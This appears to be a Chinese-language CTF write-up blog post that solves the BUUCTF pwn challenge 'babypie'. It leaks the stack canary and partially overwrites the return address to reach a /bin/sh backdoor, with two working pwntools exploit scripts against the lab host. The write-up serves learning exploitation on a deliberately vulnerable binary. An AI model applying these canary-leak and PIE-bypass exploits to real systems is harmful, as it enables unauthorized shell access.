第一篇博客,请允许我水一下。BUUCTF上的一题:linkctf_2018.7_babypie

检查一下保护机制:

1     Arch:     amd64-64-little

2     RELRO:    Partial RELRO

3     Stack:    Canary found

4     NX:       NX enabled

5     PIE:      PIE enabled

canary,pie,nx都开的栈,拖进IDA看看

 1 __int64 sub_960()

 2 {

 3   __int64 buf[6]; // [rsp+0h] [rbp-30h] BYREF

 4

 5   buf[5] = __readfsqword(0x28u);

 6   setvbuf(stdin, 0LL, 2, 0LL);

 7   setvbuf(_bss_start, 0LL, 2, 0LL);

 8   buf[0] = 0LL;

 9   buf[1] = 0LL;

10   buf[2] = 0LL;

11   buf[3] = 0LL;

12   puts("Input your Name:");

13   read(0, buf, 0x30uLL);

14   printf("Hello %s:\n", (const char *)buf);

15   read(0, buf, 0x60uLL);

16   return 0LL;

17 }
1 int sub_A3E()

2 {

3   return system("/bin/sh");

4 }
 1 .text:0000000000000960 sub_960         proc near               ; CODE XREF: main+14↓p

 2 .text:0000000000000960

 3 .text:0000000000000960 buf             = qword ptr -30h

 4 .text:0000000000000960 var_28          = qword ptr -28h

 5 .text:0000000000000960 var_20          = qword ptr -20h

 6 .text:0000000000000960 var_18          = qword ptr -18h

 7 .text:0000000000000960 var_8           = qword ptr -8

 8 .text:0000000000000960

 9 .text:0000000000000960 ; __unwind {

10 .text:0000000000000960                 push    rbp

11 .text:0000000000000961                 mov     rbp, rsp

12 .text:0000000000000964                 sub     rsp, 30h

13 .text:0000000000000968                 mov     rax, fs:28h

14 .text:0000000000000971                 mov     [rbp+var_8], rax

15 .text:0000000000000975                 xor     eax, eax

16 .text:0000000000000977                 mov     rax, cs:stdin

17 .text:000000000000097E                 mov     ecx, 0          ; n

18 .text:0000000000000983                 mov     edx, 2          ; modes

19 .text:0000000000000988                 mov     esi, 0          ; buf

20 .text:000000000000098D                 mov     rdi, rax        ; stream

21 .text:0000000000000990                 call    _setvbuf

22 .text:0000000000000995                 mov     rax, cs:__bss_start

23 .text:000000000000099C                 mov     ecx, 0          ; n

24 .text:00000000000009A1                 mov     edx, 2          ; modes

25 .text:00000000000009A6                 mov     esi, 0          ; buf

26 .text:00000000000009AB                 mov     rdi, rax        ; stream

27 .text:00000000000009AE                 call    _setvbuf

28 .text:00000000000009B3                 mov     [rbp+buf], 0

29 .text:00000000000009BB                 mov     [rbp+var_28], 0

30 .text:00000000000009C3                 mov     [rbp+var_20], 0

31 .text:00000000000009CB                 mov     [rbp+var_18], 0

32 .text:00000000000009D3                 lea     rdi, s          ; "Input your Name:"

33 .text:00000000000009DA                 call    _puts

34 .text:00000000000009DF                 lea     rax, [rbp+buf]

35 .text:00000000000009E3                 mov     edx, 30h ; '0'  ; nbytes

36 .text:00000000000009E8                 mov     rsi, rax        ; buf

37 .text:00000000000009EB                 mov     edi, 0          ; fd

38 .text:00000000000009F0                 call    _read

39 .text:00000000000009F5                 lea     rax, [rbp+buf]

40 .text:00000000000009F9                 mov     rsi, rax

41 .text:00000000000009FC                 lea     rdi, format     ; "Hello %s:\n"

42 .text:0000000000000A03                 mov     eax, 0

43 .text:0000000000000A08                 call    _printf

44 .text:0000000000000A0D                 lea     rax, [rbp+buf]

45 .text:0000000000000A11                 mov     edx, 60h ; '`'  ; nbytes

46 .text:0000000000000A16                 mov     rsi, rax        ; buf

47 .text:0000000000000A19                 mov     edi, 0          ; fd

48 .text:0000000000000A1E                 call    _read

49 .text:0000000000000A23                 mov     eax, 0

50 .text:0000000000000A28                 mov     rcx, [rbp+var_8]

51 .text:0000000000000A2C                 xor     rcx, fs:28h

52 .text:0000000000000A35                 jz      short locret_A3C

53 .text:0000000000000A37                 call    ___stack_chk_fail

54 .text:0000000000000A3C ; ---------------------------------------------------------------------------

55 .text:0000000000000A3C

56 .text:0000000000000A3C locret_A3C:                             ; CODE XREF: sub_960+D5↑j

57 .text:0000000000000A3C                 leave

58 .text:0000000000000A3D                 retn

59 .text:0000000000000A3D ; } // starts at 960

60 .text:0000000000000A3D sub_960         endp

61 .text:0000000000000A3D

62 .text:0000000000000A3E

63 .text:0000000000000A3E ; =============== S U B R O U T I N E =======================================

64 .text:0000000000000A3E

65 .text:0000000000000A3E ; Attributes: bp-based frame

66 .text:0000000000000A3E

67 .text:0000000000000A3E sub_A3E         proc near

68 .text:0000000000000A3E ; __unwind {

69 .text:0000000000000A3E                 push    rbp

70 .text:0000000000000A3F                 mov     rbp, rsp

71 .text:0000000000000A42                 lea     rdi, command    ; "/bin/sh"

72 .text:0000000000000A49                 call    _system

73 .text:0000000000000A4E                 nop

74 .text:0000000000000A4F                 pop     rbp

75 .text:0000000000000A50                 retn

76 .text:0000000000000A50 ; } // starts at A3E

77 .text:0000000000000A50 sub_A3E         endp

有个格式化字符串漏洞可以泄露canary,由于pie的开启,IDA里只显示后三位,发现后门函数地址后三位是 A3E ,和用gdb调出来的返回地址 A6A 只相差最后一个字节,由于小端序存储,我们可以直接部分字节写入,改返回地址为后门函数,即可getshell。以下附上exp:

from pwn import *

def pwn():

    s =remote('node4.buuoj.cn',27982)

    s.recvuntil(b'Input your Name:\n')

    s.sendline(b'a'*0x28)

    s.recvuntil(b'a'*0x28)

    canary=u64(s.recv(8))-0xa

    success(hex(canary))

    payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e'

    s.recvuntil(b':\n')

    s.send(payload)

    s.interactive()

pwn()

当然有兴趣的师傅也可以试看看写入双字节,爆破看看,有1/16的概率getshell。

exp:

 1 from pwn import *

 2

 3 def pwn():

 4   s.recvuntil(b'Input your Name:\n')

 5   s.sendline(b'a'*0x28)

 6   s.recvuntil(b'a'*0x28)

 7   canary=u64(s.recv(8))-0xa

 8   success(hex(canary))

 9

10   payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e\xaa'

11   s.recvuntil(b':\n')

12   s.send(payload)

13   s.sendline(b'ls')

14   k=s.recv()

15   return k

16

17

18 if __name__ == '__main__':

19   while True:

20     s =remote('node4.buuoj.cn',26877)

21     k=pwn()

22     if(b'bin' in k):

23       s.interactive()

24       break

25     s.close()

最后感谢winmt师傅的爆破指导。

partial write bypass PIE的更多相关文章

  1. CTF必备技能丨Linux Pwn入门教程——PIE与bypass思路

    Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...

  2. PIE currently adds full or partial support to IE 6 through 8 for the following CSS3 features

    PIE stands for Progressive Internet Explorer. It is an IE attached behavior which, when applied to a ...

  3. PIE SDK算法的自定义扩展

    1.算法功能简介 算法的自定义扩展允许用户自主开发新的算法.自定义的算法必须实现PIE.SystemAlgo.BaseSystemAlgo基础类,这样才能被PIE的算法管理器调用起来. 2.算法功能实 ...

  4. PHP 7.0 7.3 (Unix) - 'gc' Disable Functions Bypass

    <?php # PHP 7.0-7.3 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.ph ...

  5. PIE保护绕过

    (一):partial write 开了PIE保护的程序,其低12位地址是固定的,所以我们可以采用partial write.但是我们不能写入一个半字节,所以选择写入两个字节,倒数地位进行爆破,范围是 ...

  6. disable_functions Bypass

    参考文章和poc(文中均有poc下载地址) : https://www.uedbox.com/post/59295/ https://www.uedbox.com/post/59402/ 当然 fre ...

  7. [花式栈溢出]栈上的 partial overwrite

    [花式栈溢出]栈上的 partial overwrite 希望能在这几天对Pwn中的栈上的各种利用和其他一些较小的分支做一个收尾,以便全力投入学习堆的相关知识.初步计划是对照ctf-wiki查缺补漏. ...

  8. ASP.NET Core 中文文档 第四章 MVC(3.7 )局部视图(partial)

    原文:Partial Views 作者:Steve Smith 翻译:张海龙(jiechen).刘怡(AlexLEWIS) 校对:许登洋(Seay).何镇汐.魏美娟(初见) ASP.NET Core ...

  9. [No0000A2]“原始印欧语”(PIE)听起来是什么样子?

    "Faux Amis"节目中经常提到"原始印欧语"(PIE)——"Proto-Indo-European". 我们说过,英语,法语中的&qu ...

随机推荐

  1. RB-Tree深度探索

    关联式容器就是通过key值来寻找value,这个和数据库很相像,为了提升查找效率,因此关联式容器底层大多数用红黑树或哈希表来实现. 红黑树是高度平衡的二叉树,它也被称为平衡二元搜索树. 如上所示,正常 ...

  2. Linux基础命令---mysqlimport导入数据库

    mysqlimport mysqlimport指令可以用来将文本文件中的数据导入到数据库.在导入文本文件的时候,必须确保数据库中有一张表,而且他的名字和文本文件的名字是一样的. 此命令的适用范围:Re ...

  3. Fragment以及懒加载

    1.Fragments Fragment是Activity中用户界面的一个行为或者是一部分,你可以在一个单独的Activity上把多个Fragment组合成为一个多区域的UI,并且可以在多个Activ ...

  4. transient关键字和volatile关键字

    看到HashSet的源代码的时候,有一个关键字不太认识它..transient,百度整理之: Java的Serialization提供了一种持久化对象实例的机制,当持久化对象时,可能有一些特殊的对象数 ...

  5. js 时间戳转换为年月日时分秒的格式

    <script type="text/javascript"> var strDate = ''; $(function(){ // 获取时间戳 var nowDate ...

  6. java 9+版本中,接口的内容总结

    java 9+版本中,接口的内容可以有: 1.成员变量其实是常量,格式: [public]  [static]  [final] 数据类型 常量名称=数据值: 注意: 常量必须进行赋值,而且一旦赋值不 ...

  7. drone使用git tag作为镜像tag

    官方自动tag plugin/docker 已支持自动标签,使用方法如下 steps: - name: docker image: plugins/docker settings: repo: foo ...

  8. Mysql资料 数据类型

    目录 一.类型 整型 浮点型 定点数 字符串 二进制数据 时间日期类型 二.长度和范围 三.使用建议 原则 存储引擎 text和blob 浮点数和定点数 四.属性 一.类型 整型 取值范围如果加了un ...

  9. Docker从入门到精通(四)——常用命令

    话不多说,本篇文章给大家介绍 docker 的常用命令,基本上会覆盖我们日常使用的命令. 1.万能帮助命令 docker 命令 --help 假设你想用某个命令,但是又不知道该命令的一些参数怎么用,这 ...

  10. 自定义 UITableViewCell 的 accessory 样式

    对于 UITableViewCell 而言,其 accessoryType属性有4种取值: UITableViewCellAccessoryNone, UITableViewCellAccessory ...